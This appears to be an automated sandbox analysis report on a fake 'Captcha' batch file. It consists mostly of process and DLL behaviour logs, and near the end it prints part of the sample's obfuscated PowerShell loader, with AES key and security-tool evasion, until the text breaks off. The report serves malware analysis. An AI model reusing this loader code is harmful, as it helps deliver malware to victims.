Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5553Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4288Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 601Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1816Thread sleep count: 5553 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2132Thread sleep count: 4288 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5988Thread sleep time: -13835058055282155s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3060Thread sleep count: 601 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6068Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7756Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3360Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: svchost.exe, 0000000F.00000002.4064007067.000001DAE9A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4064453261.000001DAEF055000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4063984734.000001DAE9A27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\Captcha_V4ID882994ft.bat';$KKOH='GcdBHetcdBHCcdBHurcdBHrecdBHntcdBHPcdBHrcdBHocecdBHscdBHs'.Replace('cdBH', ''),'TrbvJsanbvJssfbvJsorbvJsmFibvJsnabvJslBbvJslobvJsckbvJs'.Replace('bvJs', ''),'MaiJRdinMiJRdodiJRduiJRdle'.Replace('iJRd', ''),'EpyvRlepyvRmepyvRntpyvRAt'.Replace('pyvR', ''),'EnAikltAiklryPAikloAikliAiklnt'.Replace('Aikl', ''),'ReaUbTzdLUbTzinUbTzes'.Replace('UbTz', ''),'ChRklaanRklageRklaExRklateRklanRklasiRklaon'.Replace('Rkla', ''),'LoucGWaducGW'.Replace('ucGW', ''),'CYNdvreYNdvaYNdvtYNdveDeYNdvcYNdvrYNdvypYNdvtoYNdvrYNdv'.Replace('YNdv', ''),'CoYevgpyYevgToYevg'.Replace('Yevg', ''),'InoGKEvooGKEkeoGKE'.Replace('oGKE', ''),'FWztZromWztZBWztZasWztZeWztZ6WztZ4WztZStrWztZinWztZg'.Replace('WztZ', ''),'SIszbplIszbiIszbtIszb'.Replace('Iszb', ''),'DeAYONcomAYONprAYONessAYON'.Replace('AYON', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($KKOH[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rUbtz($WsNJE){$aFysz=[System.Security.Cryptography.Aes]::Create();$aFysz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aFysz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aFysz.Key=[System.Convert]::($KKOH[11])('SiNWeP/fk7RgqOL4+MYNGAilPoSRNS1a+HTyg2gC1Lk=');$aFysz.IV=[System.Convert]::($KKOH[11])('yZOGdg/vBGiLeun/JpgA4Q==');$FQbge=$aFysz.($KKOH[8])();$auohI=$FQbge.($KKOH[1])($WsNJE,0,$WsNJE.Length);$FQbge.Dispose();$aFysz.Dispose();$auohI;}function LYeXU($WsNJE){$PsBXz=New-Object System.IO.MemoryStream(,$WsNJE);$qJWpS=New-Object System.IO.MemoryStream;$KUcRl=New-Object 